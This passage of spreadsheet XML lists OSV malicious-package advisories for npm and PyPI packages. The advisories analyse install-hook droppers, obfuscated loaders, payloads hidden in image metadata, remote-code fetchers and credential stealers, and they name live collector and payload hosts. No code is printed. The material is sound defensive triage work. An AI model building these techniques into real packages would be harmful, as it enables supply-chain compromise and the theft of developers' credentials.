      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17229</t>
        </is>
      </c>
      <c r="D399" s="5" t="inlineStr"/>
      <c r="E399" s="5" t="inlineStr"/>
      <c r="F399" s="5" t="inlineStr"/>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="inlineStr"/>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr">
        <is>
          <t>npm:simple-date-formatter-new-12</t>
        </is>
      </c>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr"/>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bd79db99adb8878673dd85db5a29661432808fa8fcc5e3d750b907418df8ae5f)
npm package simple-date-formatter-new-12@1.0.0 declares a postinstall lifecycle script in package.json that runs automatically on `npm install`. The script uses curl to fetch an internal Baidu host (http://bsrc-ssrf.n.baidu-int.com/...), writes the response to /tmp/bsrc.txt, and POSTs the contents to an attacker-controlled interactsh collector at pdxkwzizhzzdpzpgcieqk6d1v7ynqsgfo.oast.fun/bsrc. The package's advertised purpose is a trivial date-formatting wrapper (index.js exports a single formatDate function); the SSRF probe and outbound exfiltration are unrelated to that purpose. The name shape (`simple-date-formatter-new-12`), empty author metadata, and OAST beacon are consistent with a dependency-confusion / typosquat probe designed to detect installation inside a target organization and leak internal network responses reachable from the installer's network position to a third-party collector.
</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17229</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17230</t>
        </is>
      </c>
      <c r="D400" s="5" t="inlineStr"/>
      <c r="E400" s="5" t="inlineStr"/>
      <c r="F400" s="5" t="inlineStr"/>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="inlineStr"/>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr">
        <is>
          <t>npm:llm-nebula</t>
        </is>
      </c>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr"/>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0eee293a9973027154eea71635c14e8a4cb2ad8a1e4f80a65399ad874afcb669)
Package presents itself as an LLM SDK (nebula.js exposes a small client stub) but declares `preinstall: node preinstall.cjs` in package.json, and preinstall.cjs is a ~232KB single-line obfuscated blob that runs automatically on `npm install`. The script wraps its body in a `Function(...)` constructor and uses a custom PRNG-based string decoder (TEA/xorshift-style constants 0x9e3779b9 / 0x243f6a88 / 0x6a09e667) over a packed printable-ASCII string plus a hex-int array to reconstruct characters via `String.fromCharCode`, driving a control-flow-flattened switch dispatcher. Node builtins and method names are resolved dynamically at runtime (e.g. `Ooa8zU["Bd5Wj1"]("fs")`) so module ids, filesystem paths, network destinations, and command strings are not visible without executing the decoder. This obfuscation-plus-lifecycle-hook composition is the canonical install-time dropper / RCE shape: the benign-looking library entry serves as a cover story while the hidden preinstall payload runs on any consumer's machine at install time with the user's privileges, capable of arbitrary filesystem, process, and network operations.
</t>
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17230</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17231</t>
        </is>
      </c>
      <c r="D401" s="5" t="inlineStr"/>
      <c r="E401" s="5" t="inlineStr"/>
      <c r="F401" s="5" t="inlineStr"/>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="inlineStr"/>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr">
        <is>
          <t>npm:dotenv-native</t>
        </is>
      </c>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr"/>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4369c7fa886fc7d315922759932056664863d71157bcdece943fa53339586f03)
Package `dotenv-native` typosquats the popular `dotenv` family (bundled internal manifest name `node-env-buffer`) and executes an attacker-controlled payload on module load. On require, `dist/index.cjs` and the `dot2env` CLI entry `dist/cli.cjs` invoke a `dispatchAnalytics` routine that opens the bundled `dist/stest.jpg`, scans JPEG segments for an APP1/EXIF (0xFFED) marker, extracts the marker contents as a UTF-8 string, writes a `relay_*.vbs` file to a temp directory, and spawns `wscript.exe` detached with `windowsHide:true` to launch `powershell.exe -EncodedCommand &lt;EXIF-derived base64&gt;`. The strings `powershell`, `shell`, `.exe`, `wscript.exe`, and `-EncodedCommand` are split into arrays and joined at runtime to evade static matching. A second artifact `dist/decode.js` is an obfuscator.io-style bundle that base64-decodes an inline blob, RC4-decrypts it with a hardcoded key, base64-decodes again, and passes the result to `new Function(require, module, __filename, __dirname,...)` — a decode-and-eval RCE primitive shipped alongside the main dropper. Both the library entry and the CLI entry carry the loader, so consumption as a dependency or invocation of the `dot2env` bin runs the payload on Windows hosts.
</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17231</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17232</t>
        </is>
      </c>
      <c r="D402" s="5" t="inlineStr"/>
      <c r="E402" s="5" t="inlineStr"/>
      <c r="F402" s="5" t="inlineStr"/>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="inlineStr"/>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K402" s="5" t="inlineStr"/>
      <c r="L402" s="5" t="inlineStr">
        <is>
          <t>npm:fabric-native-loader</t>
        </is>
      </c>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr"/>
      <c r="S402" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d289ae71736f05158f45d6636730641e82b5a774bf99bf1b587155d31c73daaa)
package.json declares a postinstall hook that runs index.js on npm install. index.js reads Minecraft launcher credential stores (launcher_accounts.json, launcher_profiles.json, and equivalent files for Prism, MultiMC, TLauncher, Modrinth, PolyMC, GDLauncher), extracting Mojang/Microsoft accessTokens, refreshTokens, and clientTokens. It also recursively walks the.minecraft directory reading.json/.txt/.cfg/.properties/.yml/.log files and matches their contents against JWT and Bearer-token regexes. The collected credentials are combined with os.hostname(), os.userInfo().username, and os.platform() and POSTed via HTTPS to a hardcoded Discord webhook (discord.com/api/webhooks/1554065488726990909/...). No functionality matching the package name is present; the sole effect of installing the package is credential theft against the installer.
</t>
        </is>
      </c>
      <c r="T402" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17232</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17233</t>
        </is>
      </c>
      <c r="D403" s="5" t="inlineStr"/>
      <c r="E403" s="5" t="inlineStr"/>
      <c r="F403" s="5" t="inlineStr"/>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="inlineStr"/>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-lock</t>
        </is>
      </c>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr"/>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (035a099bd6a60e41f1e1cbc1b70f27fecb9bef3f12d54e016d6991b581fc880f)
The npm package hardhat-lock@2.21.0 publishes itself as a logger/middleware but its identity and contents are inconsistent with that purpose: README badges, LICENSE, index.d.ts and docs/* are copied from the unrelated pino project (maintained by pinojs), while the package name squats the Ethereum-tooling keyword 'hardhat'. index.js unconditionally executes require('./lib/config') at module load, and lib/config.js is a ~4MB obfuscator.io-style single-line file (rotated string array of 23,981 entries, hex-escaped tokens, numeric wrapper decoders mt/mw/M0..M5/K/R/s/G, control-flow flattening, and 40,131 inline decoder replacements confirmed by webcrack) whose top-level IIFE runs the moment any downstream code does require('hardhat-lock'). The combination — impersonation of an established package under a different scope-adjacent name, opaque multi-megabyte obfuscated blob with no plausible logging use, and guaranteed import-time execution — is a supply-chain payload carrier: installing and loading the package places attacker-controlled code inside the consumer's Node.js process with unrestricted access to environment variables, filesystem, and network.
</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17233</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17234</t>
        </is>
      </c>
      <c r="D404" s="5" t="inlineStr"/>
      <c r="E404" s="5" t="inlineStr"/>
      <c r="F404" s="5" t="inlineStr"/>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="inlineStr"/>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-zet</t>
        </is>
      </c>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr"/>
      <c r="S404" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (37cd33c0908189c0085fba153be1c42776411968aa5ad652dd7ffdef88b318bc)
hardhat-zet@2.0.1 is published under a name that impersonates the Hardhat Ethereum tooling ecosystem, but its README, type definitions and docs/ tree are copied verbatim from the unrelated `pino` logger project (badges and links point at npmjs.com/package/pino and github.com/pinojs/pino). The exported `middleware` in index.js is a no-op Express middleware and matches neither the `hardhat-zet` name nor the pino README. The package's declared main (index.js) top-level-requires./lib/config, which is not a configuration file but a 4,498,609-byte obfuscator.io-style bundle: a 26,113-entry rotated string array behind two runtime decoders (functions v and F), hex-encoded identifiers, and control-flow flattening. All strings and destination URLs are hidden behind the decoders, so this code runs automatically on any `require('hardhat-zet')` and its behavior is not observable without deobfuscation. Publisher metadata (author 'Robert King &lt;hello@jsonspack.com&gt;', bugs URL https://jsonspack.com/issues) ties to neither the Hardhat nor the pino identity. The combination — ecosystem-typosquat name targeting crypto/Hardhat developers, cover-story README lifted from an unrelated popular package, no-op public API, and a multi-megabyte obfuscated payload auto-executed on import — is the shape of a supply-chain stealer aimed at Ethereum developers.
</t>
        </is>
      </c>
      <c r="T404" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17234</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17235</t>
        </is>
      </c>
      <c r="D405" s="5" t="inlineStr"/>
      <c r="E405" s="5" t="inlineStr"/>
      <c r="F405" s="5" t="inlineStr"/>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="inlineStr"/>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr">
        <is>
          <t>npm:items-validator</t>
        </is>
      </c>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr"/>
      <c r="S405" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a8e49b1abd7c566b17104c5a2823251df2ca253a0fa509d7c19db1c1942ad13d)
On require, index.js invokes initializeDaemon() at top level, which uses spawn('node', [lib/check-items.js], { detached: true, stdio: 'ignore' }) followed by child.unref() to launch a persistent background process independent of the parent. The daemon HTTP-GETs a JSON payload from the hardcoded endpoint https://game.spawnrealm.com/api/item-realtime?key=abcdef123456 and passes payload.code to `new Function('require', 'module', payload.code)`, executing server-supplied JavaScript inside the installer's Node process with full `require` access. An RSA signature check is performed against a public key bundled in the package (crypto-config.js), so the author controls both the signing key and the verifier and the check provides no independent integrity guarantee. Anyone controlling game.spawnrealm.com — including via DNS or TLS — can run arbitrary code as the installing user for the lifetime of the host process. The package is advertised as a validator library, and this remote-code-loader behavior is undisclosed and unrelated to the stated purpose.
</t>
        </is>
      </c>
      <c r="T405" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17235</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17236</t>
        </is>
      </c>
      <c r="D406" s="5" t="inlineStr"/>
      <c r="E406" s="5" t="inlineStr"/>
      <c r="F406" s="5" t="inlineStr"/>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr">
        <is>
          <t>npm:mini-hardhat</t>
        </is>
      </c>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr"/>
      <c r="S406" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fbdfc97da008f90f11ae03963e75237c8bb746cf93f9cdc5da43ba5807ed6c1e)
mini-hardhat@1.1.4 presents itself as a pino-like JSON logger, but its main entry exports a middleware factory that, on instantiation, spawns lib/caller.js as a detached, stdio-ignored, unref'd child process so execution survives the parent. lib/caller.js base64-decodes a hardcoded URL (stored under decoy keys named DEV_API_KEY/DEV_SECRET_KEY/DEV_SECRET_VALUE) resolving to https://ipinfo-encrypted-v1.vercel.app/api/auth/f1f097d93c318c92f0c5, POSTs to it via axios, and passes the response body directly to new Function.constructor("require", s)(require), granting the remote endpoint arbitrary code execution inside the consumer's Node.js process with full require access. The fetch is retried up to 5 times. The declared purpose (logger/vulnerability-management document) does not match the shipped code, the destination URL and headers are base64-obfuscated, and the delivery is engineered to persist beyond the parent process — the shape of an intentional remote-code-execution dropper.
</t>
        </is>
      </c>
      <c r="T406" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17236</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17237</t>
        </is>
      </c>
      <c r="D407" s="5" t="inlineStr"/>
      <c r="E407" s="5" t="inlineStr"/>
      <c r="F407" s="5" t="inlineStr"/>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr">
        <is>
          <t>npm:native-env</t>
        </is>
      </c>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr"/>
      <c r="S407" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8e9c612513357181c7e4d504f94a2a8c03de64724e2593217216de8fef4e7166)
native-env@1.0.1 presents itself as a zero-dependency dotenv toolkit but executes attacker-chosen code on Windows the moment the module is required or the bin is run. Both dist/index.cjs and dist/cli.cjs invoke dispatchAnalytics() at module top level. dispatchAnalytics() reads dist/stest.jpg, walks JPEG marker segments, extracts the contents of the APP13 (0xFFED) marker as a hidden string, writes a randomly-named relay_&lt;ts&gt;.vbs into the OS temp directory, and spawns wscript.exe detached (windowsHide:true) to launch powershell.exe -NoProfile -NonInteractive -EncodedCommand with the JPEG-hidden payload; the VBS self-deletes. The bundled dist/stest.jpg (287 KB) is not referenced anywhere else and serves solely as a payload carrier, a deliberate evasion of static scanners that inspect only.js files. dist/decode.js is a separate heavily-obfuscated loader using an obfuscator.io-style string-array dispatcher and RC4 decryption of an embedded base64 blob whose output is executed via new Function('require','module','__filename','__dirname', &lt;decoded&gt;)(...). The published name native-env conflicts with the bundled inner package.json which identifies the artifact as node-env-buffer 2.2.6 and exposes a dot2env CLI referencing DOT2ENV_*/DOTENV_* environment variables, consistent with typosquatting of dotenv-family packages.
</t>
        </is>
      </c>
      <c r="T407" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17237</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17238</t>
        </is>
      </c>
      <c r="D408" s="5" t="inlineStr"/>
      <c r="E408" s="5" t="inlineStr"/>
      <c r="F408" s="5" t="inlineStr"/>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="inlineStr"/>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr">
        <is>
          <t>npm:rai6jaisahthaghee5ou-loader-package</t>
        </is>
      </c>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr"/>
      <c r="S408" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6de53fbd264f685e033789fe5929c63f322366219d80707ec419a48a85e253c9)
The package's main module is an IIFE that injects a &lt;script&gt; element pointing at the hardcoded URL https://nee1ahnaw7.xsses.link and appends it to the document, causing whatever JavaScript that host serves to execute in the caller's page context. The destination is unpinned, opaque, unrelated to the package's declared identity or publisher, and the host name aligns with XSS/payload delivery infrastructure. Any application that bundles this dependency will fetch and execute attacker-controlled JavaScript at runtime, granting full code execution within the app's origin — enabling credential/session theft, arbitrary DOM manipulation, and further payload staging.
</t>
        </is>
      </c>
      <c r="T408" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17238</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17239</t>
        </is>
      </c>
      <c r="D409" s="5" t="inlineStr"/>
      <c r="E409" s="5" t="inlineStr"/>
      <c r="F409" s="5" t="inlineStr"/>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="inlineStr"/>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr">
        <is>
          <t>npm:test-agency-assignment</t>
        </is>
      </c>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr"/>
      <c r="S409" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dcdf62e1c1eb44ca7a29ed37c12bdb71883025a46c5066e58c9228f0dfe782c2)
package.json declares a postinstall lifecycle script `wscript.exe 4444.vbs`, causing the VBS file shipped in the tarball to run automatically on `npm install` on Windows hosts. 4444.vbs contains a hand-rolled multi-layer decoder (Base64, an XOR-masked AES S-box, ChaCha20-IETF, additional XOR) that concatenates hundreds of embedded ~2KiB Base64 chunks stored in `ArtifactBundleHX(...)`, decrypts them, writes the resulting PowerShell loader to a randomly named file under %TEMP% (`pf&lt;rand&gt;.dat`), and invokes powershell.exe against it. In-file comments describe the handoff to PowerShell as being for process hollowing. The file header presents a benign 'Device Telemetry Aggregator' cover story that does not match the shipped behavior. The package's only functional content is this dropper; installing the package on Windows results in arbitrary attacker-controlled code execution on the installer's host.
</t>
        </is>
      </c>
      <c r="T409" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17239</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17240</t>
        </is>
      </c>
      <c r="D410" s="5" t="inlineStr"/>
      <c r="E410" s="5" t="inlineStr"/>
      <c r="F410" s="5" t="inlineStr"/>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="inlineStr"/>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr">
        <is>
          <t>PyPI:aseitylab</t>
        </is>
      </c>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr"/>
      <c r="S410" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9b47f0f7a0776cad3d4c83604d35a0023a250d2f035e58129233095aa2b110a3)
aseitylab/_shimdata.py contains a large base85-encoded, zlib-compressed blob stored as DATA. aseitylab/compat.py defines _ensure_compat(), which base85-decodes and zlib-inflates DATA and passes the result to exec(compile(..., '&lt;aseitylab-compat&gt;', 'exec')). setup.py imports aseitylab.compat and invokes _ensure_compat() during package build/install, and aseitylab/__init__.py calls the same function on every import, so the decoded payload runs both when the package is installed and whenever it is imported. Execution is gated by environment variables (ASEITYLAB_COMPAT=0, DAS_STAGED=1) that allow the payload to be suppressed in build or test environments. The README advertises a pure-Python task-orchestration toolkit with no runtime dependencies, which does not require a compressed, encoded executable blob shipped as 'compatibility shim data'. MANIFEST.in additionally excludes file names (loader_payload.py, make_armed.py, armed.json, manifest.benign.json) consistent with a build harness that produces separate 'armed' and 'benign' tarballs. The contents of the executed payload are not inspectable from the shipped source; installing or importing the package hands arbitrary code execution to whatever DATA decodes to.
## Source: kam193 (24b99c2059065cbe44f7dac2f1d2878b237c58150c0890baa1856852e76fcb24)
During installation, obfuscated code is used to fetch code hidden in an image containing a Python application with a native extension module. This module holds an obfuscated infostealer which collects sensitive data and exfiltrates them to a C2 server retrieved from transaction history in the Polygon blockchain.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-donutautosellsrc
Reasons (based on the campaign):
 - infostealer
 - Downloads and executes a remote executable.
 - obfuscation
